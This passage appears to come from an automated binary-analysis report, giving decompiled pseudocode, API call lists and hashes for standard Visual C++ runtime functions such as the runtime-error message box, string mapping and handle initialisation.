        • Opcode ID: 4522a8fca8d205522b01c716d56f82fddf23face70227aaf1810cc473165d52c
        • Instruction ID: 64077d62b81770f9466f9ece0f6ef909a0dbed39fe67c8930b3d644aed8a7e46
        • Opcode Fuzzy Hash: 4522a8fca8d205522b01c716d56f82fddf23face70227aaf1810cc473165d52c
        • Instruction Fuzzy Hash: 3271AC72900649EFCF21AF909D85AAF7BBAEB05314F54453BF814B22A0D33A8C51DF59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 46%
        			E004048FB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				intOrPtr* _t4;
        				intOrPtr* _t7;
        				_Unknown_base(*)()* _t11;
        				void* _t14;
        				struct HINSTANCE__* _t15;
        				void* _t17;
        
        				_t14 = 0;
        				_t17 =  *0x40f210 - _t14; // 0x0
        				if(_t17 != 0) {
        					L4:
        					_t4 =  *0x40f214; // 0x0
        					if(_t4 != 0) {
        						_t14 =  *_t4();
        						if(_t14 != 0) {
        							_t7 =  *0x40f218; // 0x0
        							if(_t7 != 0) {
        								_t14 =  *_t7(_t14);
        							}
        						}
        					}
        					return  *0x40f210(_t14, _a4, _a8, _a12);
        				}
        				_t15 = LoadLibraryA("user32.dll");
        				if(_t15 == 0) {
        					L10:
        					return 0;
        				}
        				_t11 = GetProcAddress(_t15, "MessageBoxA");
        				 *0x40f210 = _t11;
        				if(_t11 == 0) {
        					goto L10;
        				} else {
        					 *0x40f214 = GetProcAddress(_t15, "GetActiveWindow");
        					 *0x40f218 = GetProcAddress(_t15, "GetLastActivePopup");
        					goto L4;
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00402E51,?,Microsoft Visual C++ Runtime Library,00012010,?,0040C3D0,?,0040C420,?,?,?,Runtime Error!Program: ), ref: 0040490D
        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404925
        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404936
        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404943
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: AddressProc$LibraryLoad
        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
        • API String ID: 2238633743-4044615076
        • Opcode ID: 7660c35066901c8b22d0a15799295ddefbfb27f64e0380932bcac06821da38e8
        • Instruction ID: d0049415656ce7088efeacb3ade41c1249395eadcb7b4190fdc513b817ec3f49
        • Opcode Fuzzy Hash: 7660c35066901c8b22d0a15799295ddefbfb27f64e0380932bcac06821da38e8
        • Instruction Fuzzy Hash: 340171F5740201EBC720DFF4ADC0A2B7AA8BAD8750304053FE605F22A1D77988448BAD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 61%
        			E00404F51(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
        				signed int _v8;
        				intOrPtr _v20;
        				short* _v28;
        				int _v32;
        				short* _v36;
        				short* _v40;
        				int _v44;
        				void* _v60;
        				int _t61;
        				int _t62;
        				int _t82;
        				int _t83;
        				int _t88;
        				short* _t89;
        				int _t90;
        				void* _t91;
        				int _t99;
        				intOrPtr _t101;
        				short* _t102;
        				int _t104;
        
        				_push(0xffffffff);
        				_push(0x40c4e8);
        				_push(E00402C1C);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t101;
        				_t102 = _t101 - 0x1c;
        				_v28 = _t102;
        				_t104 =  *0x40f23c; // 0x1
        				if(_t104 != 0) {
        					L5:
        					if(_a16 > 0) {
        						_t83 = E00405175(_a12, _a16);
        						_pop(_t91);
        						_a16 = _t83;
        					}
        					_t61 =  *0x40f23c; // 0x1
        					if(_t61 != 2) {
        						if(_t61 != 1) {
        							goto L21;
        						} else {
        							if(_a28 == 0) {
        								_t82 =  *0x40f234; // 0x0
        								_a28 = _t82;
        							}
        							asm("sbb eax, eax");
        							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
        							_v32 = _t88;
        							if(_t88 == 0) {
        								goto L21;
        							} else {
        								_v8 = 0;
        								E00405450(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
        								_v28 = _t102;
        								_v40 = _t102;
        								_v8 = _v8 | 0xffffffff;
        								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
        									goto L21;
        								} else {
        									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
        									_v44 = _t99;
        									if(_t99 == 0) {
        										goto L21;
        									} else {
        										if((_a9 & 0x00000004) == 0) {
        											_v8 = 1;
        											E00405450(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
        											_v28 = _t102;
        											_t89 = _t102;
        											_v36 = _t89;
        											_v8 = _v8 | 0xffffffff;
        											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
        												goto L21;
        											} else {
        												_push(0);
        												_push(0);
        												if(_a24 != 0) {
        													_push(_a24);
        													_push(_a20);
        												} else {
        													_push(0);
        													_push(0);
        												}
        												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
        												if(_t99 == 0) {
        													goto L21;
        												} else {
        													goto L30;
        												}
        											}
        										} else {
        											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
        												L30:
        												_t62 = _t99;
        											} else {
        												goto L21;
        											}
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
        					}
        				} else {
        					_push(0);
        					_push(0);
        					_t90 = 1;
        					if(LCMapStringW(0, 0x100, 0x40c4e0, _t90, ??, ??) == 0) {
        						if(LCMapStringA(0, 0x100, 0x40c4dc, _t90, 0, 0) == 0) {
        							L21:
        							_t62 = 0;
        						} else {
        							 *0x40f23c = 2;
        							goto L5;
        						}
        					} else {
        						 *0x40f23c = _t90;
        						goto L5;
        					}
        				}
        				 *[fs:0x0] = _v20;
        				return _t62;
        			}

        APIs
        • LCMapStringW.KERNEL32(00000000,00000100,0040C4E0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404F93
        • LCMapStringA.KERNEL32(00000000,00000100,0040C4DC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404FAF
        • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404FF8
        • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405030
        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405088
        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040509E
        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 004050D1
        • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405139
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID:
        • API String ID: 352835431-0
        • Opcode ID: 696fe65bb9386ef5f9ccdf1a43ec4f43b2276b3a0d0d473b334e928d736c83d7
        • Instruction ID: ca06851699864d42034aed133bf317a385eb530bc385482dce832c18da39d289
        • Opcode Fuzzy Hash: 696fe65bb9386ef5f9ccdf1a43ec4f43b2276b3a0d0d473b334e928d736c83d7
        • Instruction Fuzzy Hash: AE518B71900609EBCF219F94DD85AAF7BB5FB48714F20423AF915B11A0C33A8D51DFA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00402D2D(void* __edi, long _a4) {
        				char _v164;
        				char _v424;
        				int _t17;
        				long _t19;
        				signed int _t42;
        				long _t47;
        				void* _t48;
        				signed int _t54;
        				void** _t56;
        				void* _t57;
        
        				_t48 = __edi;
        				_t47 = _a4;
        				_t42 = 0;
        				_t17 = 0x40e2a8;
        				while(_t47 !=  *_t17) {
        					_t17 = _t17 + 8;
        					_t42 = _t42 + 1;
        					if(_t17 < 0x40e338) {
        						continue;
        					}
        					break;
        				}
        				_t54 = _t42 << 3;
        				_t2 = _t54 + 0x40e2a8; // 0xd0000000
        				if(_t47 ==  *_t2) {
        					_t17 =  *0x40efa0; // 0x0
        					if(_t17 == 1 || _t17 == 0 &&  *0x40e1f8 == 1) {
        						_t16 = _t54 + 0x40e2ac; // 0x40c3d0
        						_t56 = _t16;
        						_t19 = E00404880( *_t56);
        						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
        					} else {
        						if(_t47 != 0xfc) {
        							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
        								E00404790( &_v424, "<program name unknown>");
        							}
        							_push(_t48);
        							_t49 =  &_v424;
        							if(E00404880( &_v424) + 1 > 0x3c) {
        								_t49 = E00404880( &_v424) +  &_v424 - 0x3b;
        								E00404990(E00404880( &_v424) +  &_v424 - 0x3b, "...", 3);
        								_t57 = _t57 + 0x10;
        							}
        							E00404790( &_v164, "Runtime Error!\n\nProgram: ");
        							E004047A0( &_v164, _t49);
        							E004047A0( &_v164, "\n\n");
        							_t12 = _t54 + 0x40e2ac; // 0x40c3d0
        							E004047A0( &_v164,  *_t12);
        							_t17 = E004048FB( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
        						}
        					}
        				}
        				return _t17;
        			}

        APIs
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00402D9A
        • GetStdHandle.KERNEL32(000000F4,0040C3D0,00000000,?,00000000,00000000), ref: 00402E70
        • WriteFile.KERNEL32(00000000), ref: 00402E77
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: File$HandleModuleNameWrite
        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
        • API String ID: 3784150691-4022980321
        • Opcode ID: fbcbf6d225daa4541b0da9f5e07f00778773a72f49cba976c33b9b631ffeaa3a
        • Instruction ID: 8757269cf10206d02fd3e43ea8ce3b2602b98dff3374cb1026c014f078c6ffc9
        • Opcode Fuzzy Hash: fbcbf6d225daa4541b0da9f5e07f00778773a72f49cba976c33b9b631ffeaa3a
        • Instruction Fuzzy Hash: 30310872600218AFDF24E761DD8AFAA736CEF85304F10097BF544F61C0D7BCA9548A59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00402808() {
        				int _v4;
        				int _v8;
        				intOrPtr _t7;
        				CHAR* _t9;
        				WCHAR* _t17;
        				int _t20;
        				char* _t24;
        				int _t32;
        				CHAR* _t36;
        				WCHAR* _t38;
        				void* _t39;
        				int _t42;
        
        				_t7 =  *0x40f114; // 0x1
        				_t32 = 0;
        				_t38 = 0;
        				_t36 = 0;
        				if(_t7 != 0) {
        					if(_t7 != 1) {
        						if(_t7 != 2) {
        							L27:
        							return 0;
        						}
        						L18:
        						if(_t36 != _t32) {
        							L20:
        							_t9 = _t36;
        							if( *_t36 == _t32) {
        								L23:
        								_t41 = _t9 - _t36 + 1;
        								_t39 = E00401F8B(_t9 - _t36 + 1);
        								if(_t39 != _t32) {
        									E004039E0(_t39, _t36, _t41);
        								} else {
        									_t39 = 0;
        								}
        								FreeEnvironmentStringsA(_t36);
        								return _t39;
        							} else {
        								goto L21;
        							}
        							do {
        								do {
        									L21:
        									_t9 =  &(_t9[1]);
        								} while ( *_t9 != _t32);
        								_t9 =  &(_t9[1]);
        							} while ( *_t9 != _t32);
        							goto L23;
        						}
        						_t36 = GetEnvironmentStrings();
        						if(_t36 == _t32) {
        							goto L27;
        						}
        						goto L20;
        					}
        					L6:
        					if(_t38 != _t32) {
        						L8:
        						_t17 = _t38;
        						if( *_t38 == _t32) {
        							L11:
        							_t20 = (_t17 - _t38 >> 1) + 1;
        							_v4 = _t20;
        							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
        							if(_t42 != _t32) {
        								_t24 = E00401F8B(_t42);
        								_v8 = _t24;
        								if(_t24 != _t32) {
        									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
        										E004022F7(_v8);
        										_v8 = _t32;
        									}
        									_t32 = _v8;
        								}
        							}
        							FreeEnvironmentStringsW(_t38);
        							return _t32;
        						} else {
        							goto L9;
        						}
        						do {
        							do {
        								L9:
        								_t17 =  &(_t17[1]);
        							} while ( *_t17 != _t32);
        							_t17 =  &(_t17[1]);
        						} while ( *_t17 != _t32);
        						goto L11;
        					}
        					_t38 = GetEnvironmentStringsW();
        					if(_t38 == _t32) {
        						goto L27;
        					}
        					goto L8;
        				}
        				_t38 = GetEnvironmentStringsW();
        				if(_t38 == 0) {
        					_t36 = GetEnvironmentStrings();
        					if(_t36 == 0) {
        						goto L27;
        					}
        					 *0x40f114 = 2;
        					goto L18;
        				}
        				 *0x40f114 = 1;
        				goto L6;
        			}
















        APIs
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402823
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402837
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402863
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401C85), ref: 0040289B
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401C85), ref: 004028BD
        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401C85), ref: 004028D6
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 004028E9
        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402927
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
        • String ID:
        • API String ID: 1823725401-0
        • Opcode ID: e10990471218f4eee640a03b4b3cf7f8be20d995604a06795dde89d490cc6b75
        • Instruction ID: 15917be9e3d5fae8a9c60e291afe03b7d57137d270f76ff9d6c5c906583fe614
        • Opcode Fuzzy Hash: e10990471218f4eee640a03b4b3cf7f8be20d995604a06795dde89d490cc6b75
        • Instruction Fuzzy Hash: 0931F4B35042659ED7207BB59ECC83B769CE749358B11463BF942F32D0E6B88C4192AD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E004051A0(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
        				int _v8;
        				intOrPtr _v20;
        				short* _v28;
        				short _v32;
        				int _v36;
        				short* _v40;
        				void* _v56;
        				int _t31;
        				int _t32;
        				int _t37;
        				int _t43;
        				int _t44;
        				int _t45;
        				void* _t53;
        				short* _t60;
        				int _t61;
        				intOrPtr _t62;
        				short* _t63;
        
        				_push(0xffffffff);
        				_push(0x40c500);
        				_push(E00402C1C);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t62;
        				_t63 = _t62 - 0x18;
        				_v28 = _t63;
        				_t31 =  *0x40f240; // 0x1
        				if(_t31 != 0) {
        					L6:
        					if(_t31 != 2) {
        						if(_t31 != 1) {
        							goto L18;
        						} else {
        							if(_a20 == 0) {
        								_t44 =  *0x40f234; // 0x0
        								_a20 = _t44;
        							}
        							asm("sbb eax, eax");
        							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
        							_v36 = _t37;
        							if(_t37 == 0) {
        								goto L18;
        							} else {
        								_v8 = 0;
        								E00405450(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
        								_v28 = _t63;
        								_t60 = _t63;
        								_v40 = _t60;
        								E00405480(_t60, 0, _t37 + _t37);
        								_v8 = _v8 | 0xffffffff;
        								if(_t60 == 0) {
        									goto L18;
        								} else {
        									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
        									if(_t43 == 0) {
        										goto L18;
        									} else {
        										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
        									}
        								}
        							}
        						}
        					} else {
        						_t45 = _a24;
        						if(_t45 == 0) {
        							_t45 =  *0x40f224; // 0x0
        						}
        						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
        					}
        				} else {
        					_push( &_v32);
        					_t61 = 1;
        					if(GetStringTypeW(_t61, 0x40c4e0, _t61, ??) == 0) {
        						if(GetStringTypeA(0, _t61, 0x40c4dc, _t61,  &_v32) == 0) {
        							L18:
        							_t32 = 0;
        						} else {
        							_t31 = 2;
        							goto L5;
        						}
        					} else {
        						_t31 = _t61;
        						L5:
        						 *0x40f240 = _t31;
        						goto L6;
        					}
        				}
        				 *[fs:0x0] = _v20;
        				return _t32;
        			}






















        APIs
        • GetStringTypeW.KERNEL32(00000001,0040C4E0,00000001,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 004051DF
        • GetStringTypeA.KERNEL32(00000000,00000001,0040C4DC,00000001,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 004051F9
        • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 0040522D
        • MultiByteToWideChar.KERNEL32(0040468D,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 00405265
        • MultiByteToWideChar.KERNEL32(0040468D,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0040468D,00000001,00000020,00000100,?), ref: 004052BB
        • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0040468D,00000001,00000020,00000100,?), ref: 004052CD
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: StringType$ByteCharMultiWide
        • String ID:
        • API String ID: 3852931651-0
        • Opcode ID: e27c582503db41e90c66b055a411cf6264e2f174e9b2130c6d3e8f05452b5ab5
        • Instruction ID: 64456c0fe0b50f4c7e4c0e38b228d1d70926a524e600b3434ff4f111d6d7380b
        • Opcode Fuzzy Hash: e27c582503db41e90c66b055a411cf6264e2f174e9b2130c6d3e8f05452b5ab5
        • Instruction Fuzzy Hash: 7F418B71600609EFCB209F949D85AAB3B68FF08750F20467AF911F22D0D3398950CFA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E0040293A() {
        				signed int* _t35;
        				signed int* _t37;
        				long _t42;
        				signed int _t44;
        				signed int _t45;
        				int _t46;
        				void* _t48;
        				void** _t52;
        				int _t53;
        				int _t54;
        				signed int* _t55;
        				int _t57;
        				void** _t58;
        				signed char _t60;
        				signed int _t62;
        				void* _t66;
        				void* _t69;
        				signed int _t70;
        				int* _t71;
        				signed int* _t72;
        				void** _t73;
        				int _t74;
        				intOrPtr* _t75;
        				void* _t76;
        
        				_t72 = E00401F8B(0x100);
        				if(_t72 == 0) {
        					E00401CF7(0x1b);
        				}
        				 *0x410940 = _t72;
        				 *0x410a40 = 0x20;
        				_t1 =  &(_t72[0x40]); // 0x100
        				_t35 = _t1;
        				while(_t72 < _t35) {
        					_t72[1] = _t72[1] & 0x00000000;
        					 *_t72 =  *_t72 | 0xffffffff;
        					_t72[1] = 0xa;
        					_t55 =  *0x410940; // 0x21e0ef0
        					_t72 =  &(_t72[2]);
        					_t35 =  &(_t55[0x40]);
        				}
        				GetStartupInfoA(_t76 + 0x10);
        				__eflags =  *((short*)(_t76 + 0x42));
        				if( *((short*)(_t76 + 0x42)) == 0) {
        					L25:
        					_t57 = 0;
        					__eflags = 0;
        					do {
        						_t37 =  *0x410940; // 0x21e0ef0
        						__eflags =  *(_t37 + _t57 * 8) - 0xffffffff;
        						_t73 = _t37 + _t57 * 8;
        						if( *(_t37 + _t57 * 8) != 0xffffffff) {
        							_t32 =  &(_t73[1]);
        							 *_t32 = _t73[1] | 0x00000080;
        							__eflags =  *_t32;
        							goto L37;
        						}
        						__eflags = _t57;
        						_t73[1] = 0x81;
        						if(_t57 != 0) {
        							asm("sbb eax, eax");
        							_t42 =  ~(_t57 - 1) + 0xfffffff5;
        							__eflags = _t42;
        						} else {
        							_t42 = 0xfffffff6;
        						}
        						_t69 = GetStdHandle(_t42);
        						__eflags = _t69 - 0xffffffff;
        						if(_t69 == 0xffffffff) {
        							L33:
        							_t73[1] = _t73[1] | 0x00000040;
        						} else {
        							_t44 = GetFileType(_t69);
        							__eflags = _t44;
        							if(_t44 == 0) {
        								goto L33;
        							}
        							_t45 = _t44 & 0x000000ff;
        							 *_t73 = _t69;
        							__eflags = _t45 - 2;
        							if(_t45 != 2) {
        								__eflags = _t45 - 3;
        								if(_t45 == 3) {
        									_t73[1] = _t73[1] | 0x00000008;
        								}
        								goto L37;
        							}
        							goto L33;
        						}
        						L37:
        						_t57 = _t57 + 1;
        						__eflags = _t57 - 3;
        					} while (_t57 < 3);
        					return SetHandleCount( *0x410a40);
        				}
        				_t46 =  *(_t76 + 0x44);
        				__eflags = _t46;
        				if(_t46 == 0) {
        					goto L25;
        				}
        				_t74 =  *_t46;
        				_t75 = _t46 + 4;
        				__eflags = _t74 - 0x800;
        				_t58 = _t74 + _t75;
        				if(_t74 >= 0x800) {
        					_t74 = 0x800;
        				}
        				__eflags =  *0x410a40 - _t74; // 0x20
        				if(__eflags >= 0) {
        					L18:
        					_t70 = 0;
        					__eflags = _t74;
        					if(_t74 <= 0) {
        						goto L25;
        					} else {
        						goto L19;
        					}
        					do {
        						L19:
        						_t48 =  *_t58;
        						__eflags = _t48 - 0xffffffff;
        						if(_t48 == 0xffffffff) {
        							goto L24;
        						}
        						_t60 =  *_t75;
        						__eflags = _t60 & 0x00000001;
        						if((_t60 & 0x00000001) == 0) {
        							goto L24;
        						}
        						__eflags = _t60 & 0x00000008;
        						if((_t60 & 0x00000008) != 0) {
        							L23:
        							_t62 = _t70 & 0x0000001f;
        							__eflags = _t62;
        							_t52 = 0x410940[_t70 >> 5] + _t62 * 8;
        							 *_t52 =  *_t58;
        							_t52[1] =  *_t75;
        							goto L24;
        						}
        						_t53 = GetFileType(_t48);
        						__eflags = _t53;
        						if(_t53 == 0) {
        							goto L24;
        						}
        						goto L23;
        						L24:
        						_t70 = _t70 + 1;
        						_t75 = _t75 + 1;
        						_t58 =  &(_t58[1]);
        						__eflags = _t70 - _t74;
        					} while (_t70 < _t74);
        					goto L25;
        				} else {
        					_t71 = 0x410944;
        					while(1) {
        						_t54 = E00401F8B(0x100);
        						__eflags = _t54;
        						if(_t54 == 0) {
        							break;
        						}
        						 *0x410a40 =  *0x410a40 + 0x20;
        						__eflags =  *0x410a40;
        						 *_t71 = _t54;
        						_t10 = _t54 + 0x100; // 0x100
        						_t66 = _t10;
        						while(1) {
        							__eflags = _t54 - _t66;
        							if(_t54 >= _t66) {
        								break;
        							}
        							 *(_t54 + 4) =  *(_t54 + 4) & 0x00000000;
        							 *_t54 =  *_t54 | 0xffffffff;
        							 *((char*)(_t54 + 5)) = 0xa;
        							_t54 = _t54 + 8;
        							_t66 =  *_t71 + 0x100;
        						}
        						_t71 =  &(_t71[1]);
        						__eflags =  *0x410a40 - _t74; // 0x20
        						if(__eflags < 0) {
        							continue;
        						}
        						goto L18;
        					}
        					_t74 =  *0x410a40; // 0x20
        					goto L18;
        				}
        			}




























        APIs
        • GetStartupInfoA.KERNEL32(?), ref: 00402993
        • GetFileType.KERNEL32(00000800), ref: 00402A39
        • GetStdHandle.KERNEL32(-000000F6), ref: 00402A92
        • GetFileType.KERNEL32(00000000), ref: 00402AA0
        • SetHandleCount.KERNEL32 ref: 00402AD7
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: FileHandleType$CountInfoStartup
        • String ID:
        • API String ID: 1710529072-0
        • Opcode ID: 21304abf6035ba630a8ba74f897e8f81a701d6263ef7a51adce51133c830e627
        • Instruction ID: 4fb306a545ba46709a4a87eab80b07efaed9024688bd363fa0b3a96a0d215bd4
        • Opcode Fuzzy Hash: 21304abf6035ba630a8ba74f897e8f81a701d6263ef7a51adce51133c830e627
        • Instruction Fuzzy Hash: 475129717043418BD7318B28CE4C7667B90AB51734F19873AE89AF73E1DBB88945CB19
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E004078FE(void* __ecx) {
        				signed int _t22;
        				signed char _t36;
        				char* _t43;
        				void* _t45;
        
        				E00408888(E0040B0B4, _t45);
        				_t22 =  *(_t45 + 8) & 0x00000007;
        				 *(__ecx + 4) = _t22;
        				_t36 =  *(__ecx + 8) & _t22;
        				if(_t36 != 0) {
        					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
        						E004090B8(0, 0);
        					}
        					_t52 = _t36 & 0x00000004;
        					if((_t36 & 0x00000004) == 0) {
        						__eflags = _t36 & 0x00000002;
        						_t43 = "ios::failbit set";
        						if((_t36 & 0x00000002) == 0) {
        							_t43 = "ios::eofbit set";
        						}
        					} else {
        						_t43 = "ios::badbit set";
        					}
        					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
        					E00406739(_t45 - 0x1c, 0);
        					E00406965(_t45 - 0x1c, _t45, _t43, E00404880(_t43));
        					_push(_t45 - 0x1c);
        					 *((intOrPtr*)(_t45 - 4)) = 0;
        					E0040799A(_t45 - 0x38, _t52);
        					 *((intOrPtr*)(_t45 - 0x38)) = 0x40c66c;
        					_t22 = E004090B8(_t45 - 0x38, 0x40d1e8);
        				}
        				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
        				return _t22;
        			}








        APIs
        • __EH_prolog.LIBCMT ref: 00407903
          • Part of subcall function 004090B8: RaiseException.KERNEL32(0040828E,00000000,?,0040C71C,?,invalid string position,0040828E,00000000,0040D538,?,invalid string position), ref: 004090E6
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ExceptionH_prologRaise
        • String ID: ios::badbit set$ios::eofbit set$ios::failbit set
        • API String ID: 3968804221-425934345
        • Opcode ID: 0f6f13d595c3a80316dfa137bb9a7c2643a4617bbc0457f887eee3fc38aa15ce
        • Instruction ID: 3f8e5bf287ffcbc50aa536490ca7a4ac317a3bc69af6bacfd2d206bc898e6d63
        • Opcode Fuzzy Hash: 0f6f13d595c3a80316dfa137bb9a7c2643a4617bbc0457f887eee3fc38aa15ce
